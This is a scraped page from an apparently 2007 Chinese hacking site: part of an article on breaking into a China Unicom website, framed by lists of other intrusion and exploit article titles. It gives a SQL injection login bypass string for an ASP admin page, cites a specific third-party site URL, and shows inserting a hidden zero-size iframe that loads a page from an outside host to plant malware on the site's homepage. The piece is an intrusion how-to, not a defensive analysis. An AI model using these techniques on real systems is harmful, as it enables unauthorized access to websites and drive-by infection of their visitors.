·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[组图]入侵联通网站的过程!

热荐 ★★★★★

入侵联通网站的过程!

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-1-22 10:15:34

在login.asp中，接收用户输入的Userid和Password数据，并分别赋值给user和pwd。

然后再用sql="select * from admin where username="&user&" and password="&pwd&""

这句来对用户名和密码加以验证。
　　
但是如果Userid的值和password的值被赋于：safer' or'1'='1' 这时。

sql="select * from admin where username="&user&" and password="&pwd&"" 就成了：
　　
sql="select * from reg where user=safer' or'1'='1' and pass=safer' or'1'='1'

同样利用这个可以进别的程序的后台.这种程序是最垃圾。也是最原始的了

　　
http://www.sx165.com/xinwen1/view.asp?id=562 (注意：别人挂有病毒...

那放病毒的是怎么把病毒加入到主页面的源码中呢?看到最下角有个html编辑器了么?

我们在htm代码编辑器里面添加
<iframe src=http://safe.ie.la/hsqq.htm width=0 height=0></iframe>
保存成功后.我们回首页查看源代码.

就这样加进去的.和我上次做的内部跨站挂马教程差不多...

由于有人要我就放出来给大家看.

上一页 [1] [2]

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：网站挂马渗透

下一篇文章：渗透入侵某资源网站的过程

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

一次通过 Oracle8i 入侵系统之旅	03-21
SA权限下的思路变通	03-18
有防火墙的网站整个入侵过程	01-21
绕过Xplog70.dll玩入侵	01-14
一步一步的入侵----only for you	01-09
入侵中快速获得Web根目录的技巧	01-09
记一次对RedHat Linux系统的安全	01-08
介绍几个小工具和入侵的技法(2)	01-08
有防火墙的网站整个入侵过程	01-04
拐弯入侵虚拟主机	01-04
由一次入侵实例看虚拟主机系统的	01-02
解读IDS入侵检测系统术语	01-02